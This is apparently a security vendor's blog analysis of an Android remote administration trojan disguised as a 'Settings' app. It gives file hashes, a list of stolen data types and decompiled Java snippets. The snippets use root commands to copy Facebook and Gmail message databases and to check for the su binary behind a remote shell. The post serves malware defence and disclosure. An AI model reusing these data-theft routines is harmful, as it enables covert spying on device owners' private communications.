Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of  8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain the persistence on the system:

 

image02


The app runs itself as a service in the background:

 

image01


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

 

image04


The app is developed by “www.onespy.in” and signed with the following certificate:

 

image03


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender

{

 private static boolean copyDB(String paramString1, String paramString2)

 {

   try

   {

     L.l(“fb copy:” + paramString1 + “;” + paramString2);

     paramString1 = “cp ” + paramString1 + ” ” + paramString2;

     int i = Runtime.getRuntime().exec(new String[] { “su”, “-c”, paramString1 }).waitFor();

     return i == 0;

   }

   catch (Exception paramString1)

   {

     L.l(paramString1);

   }

   return false;

 }

 

 private static String getName(String paramString)

 {

   try

   {

     paramString = new JSONObject(paramString).getString(“name”);

     return paramString;

   }

   catch (Exception paramString) {}

   return “”;

 }

[…]

 private static void sendThreadsTable(Context paramContext)

 {

   if (Environment.getExternalStorageState().equals(“mounted”)) {

     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

   }

   for (;;)

   {

     str = localObject + “/fbdb2.db”;

     if (Environment.getExternalStorageState().equals(“mounted”))

     {

       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

       localObject = localObject + “/fb_chat.csv”;

     }

     for (;;)

     {

       try

       {

         if (copyDB(“/data/data/com.facebook.katana/databases/threads_db2”, str))

         {

           L.l(“fbdb copied”);

           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);

           localCursor = localSQLiteDatabase.rawQuery(“SELECT sender, text, timestamp_ms FROM messages”, null);

    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader

{

 private static final String dbnamePrefix = “gmldbcp_”;

 

 private static String[] copyDB(Context paramContext)

 {

   Object localObject3;

   int i;

   int j;

   OutputStream localOutputStream;

   try

   {

     localObject1 = Runtime.getRuntime().exec(new String[] { “su”, “-c”, “find / -name mailstore*@gmail.com.db” }).getInputStream();

     Object localObject2 = new byte[660];

     localObject3 = new StringBuffer();

     for (;;)

     {

       i = ((InputStream)localObject1).read((byte[])localObject2);

       if (i == -1)

       {

         localObject2 = ((StringBuffer)localObject3).toString().split(“n”);

         localObject3 = new String[localObject2.length];

         j = 0;

         Process localProcess = Runtime.getRuntime().exec(“su”);

         localOutputStream = localProcess.getOutputStream();

         int k = localObject2.length;

         i = 0;

         if (i < k) {

           break;

         }

        […]

   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf(‘/’) + 1, ((String)localObject1).lastIndexOf(‘@’));

   StringBuilder localStringBuilder = new StringBuilder(“cp “).append((String)localObject1).append(” “);

   if (Environment.getExternalStorageState().equals(“mounted”)) {}

   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())

   {

     localOutputStream.write(((String)localObject1 + “/” + “gmldbcp_” + str + “.dbn”).getBytes());

     localObject3[j] = str;

     j += 1;

     i += 1;

     break;

   }

 }

      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the linux system in an android device:

public class ExecShell {

   public enum SHELL_CMD {

       public static final enum SHELL_CMD check_su_binary;

 

       static {

           SHELL_CMD.check_su_binary = new SHELL_CMD(“check_su_binary”, 0, new String[]{“/system/xbin/which”,

                   “su”});

           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};

       }

 

       private SHELL_CMD(String arg1, int arg2, String[] command) {

           super(arg1, arg2);

           this.command = command;

       }

 

       public static SHELL_CMD valueOf(String arg1) {

           return Enum.valueOf(SHELL_CMD.class, arg1);

       }

 

       public static SHELL_CMD[] values() {

           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;

           int v1 = v0.length;

           SHELL_CMD[] v2 = new SHELL_CMD[v1];

           System.arraycopy(v0, 0, v2, 0, v1);

           return v2;

       }

   }


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s